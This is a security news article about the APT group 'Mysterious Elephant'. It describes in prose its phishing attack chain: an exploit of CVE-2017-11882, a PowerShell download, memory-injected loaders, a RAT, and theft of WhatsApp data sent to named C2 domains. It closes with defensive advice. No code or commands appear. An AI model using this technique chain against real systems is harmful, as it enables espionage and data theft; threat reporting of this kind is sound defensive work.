In recent months, cyber security has uncovered a new group of hackers, Mysterious Elephant, which is being evaluated as a formidable threat in the Asia – Pacific region.

8d5345df20f4adaaf4e5.jpg

According to the team, the group has continuously developed its attack tools from 2023 to the present, focusing on government agencies and diplomatic organizations with the goal of gathering confidential information and maintaining long – term access.

The original operations of Mysterious Elephant seemed simple, such as using fake email to send malicious Office documents. By 2025, however, their technology has been significantly upgraded.

When the victim opened the document, the hacker exploited the CVE – 2017-11882 vulnerability in Microsoft Office’s formula editor. This is a long – standing bug that still works because many users and organizations don’t have the patches updated. As soon as the vulnerability is exploited, the document automatically activates the PowerShell command to download a malicious code called BabShell, which is considered the group’s platform tool. BabShell works silently, allowing hackers to install additional components without leaving a trace on the drive.

After the initial invasion, Mysterious Elephant deploys a second loader, the MemLoader HidenDesk (a tool injected directly into the memory, which helps hide the activity from the antivirus software and reduces forensic traces).

When active, the malicious code installs RAT remote control software, allowing hackers to control the system, move to other machines in the local network, and collect sensitive data. The team’s main goal was to steal WhatsApp data, including documents, photos, archival files, etc. Data were preliminarily encrypted with XOR and sent back to the control server (C2), through camouflage domains such as Storycentral.net or monsoonconference.com, making this traffic look like normal web activity.

This campaign demonstrates the sophistication and persistence characteristic of the Advanced Persistent Threat (APT) groups. The use of open source tools, combined with self-written malicious code, suggests that Mysterious Elephant has a high level of technical expertise and an in-depth understanding of corporate security mechanisms. The scope of the attacks is currently noted primarily in state agencies, diplomatic organizations and the financial sector and at the same time they concern the entire region in the Asia – Pacific.

If not detected early, the group may maintain access for months, gather strategic information, or serve as a springboard for further attacks.

To limit the risk from campaigns such as Mysterious Elephant, organisations should:

  • Fully update security patches, especially for older bugs such as CVE-2017-11882.
  • Train your employees to identify scam emails and not open suspicious attachments.
  • Monitor your network traffic to detect connections to suspicious areas.
  • Implement EDR/XDR solutions to detect abnormal activity in memory.
  • Check your system logs periodically for signs of PowerShell or DLL use.

Mysterious Elephant shows that old vulnerabilities remain effective “backdoor” if users neglect updating. Given the momentum of APT groups in the region, agencies and businesses need to take active defense instead of reacting only when attacked.

WhiteHat